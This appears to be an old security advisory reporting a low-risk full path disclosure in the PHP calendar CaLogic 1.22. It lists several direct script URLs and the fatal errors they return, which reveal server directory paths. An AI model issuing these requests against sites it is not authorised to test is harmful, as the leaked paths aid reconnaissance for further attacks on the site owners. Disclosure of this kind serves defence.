Full path disclosure in CaLogic 1.22 and possible in older versions.
Full path disclosure in CaLogic 1.22 and possible in older versions.
Language: PHP
Project name: CaLogic
Risk: Low
Home page: http://www.calogic.de
Discovered by: ][GB][ & Zetha
Explotation examples:
http://[target]/calogic122/doclsqlres.php
Fatal error: Call to a member function on a non-object in
/home/calogic/doclsqlres.php on line 2
http://[target]/calogic122/clmcpreload.php
Fatal error: Cannot instantiate non-existent class: clsession in
/home/calogic/clmcpreload.php on line 46
http://[target]/calogic122/viewhistlog.php
Fatal error: Call to a member function on a non-object in
/home/calogic/viewhistlog.php on line 2
http://[target]/calogic122/mcconfig.php
Fatal error: main(): Failed opening required '/admin/dbloader.php'
(include_path='CCCTest/codegeni/app/settings/') in /home/calogic/mcconfig.php
on line 15
http://[target]/calogic122/doclsqlbak.php
Fatal error: Call to a member function on a non-object in
/home/calogic/doclsqlbak.php on line 2
http://[target]/calogic122/defcalsel.php
Fatal error: Call to a member function on a non-object in
/home/calogic/defcalsel.php on line 41
http://[target]/calogic122/cl_minical.php
Fatal error: Call to undefined function: setviewtext() in
/home/calogic/cl_minical.php on line 10
irc.gigachat.net #Uruguay #D.O.M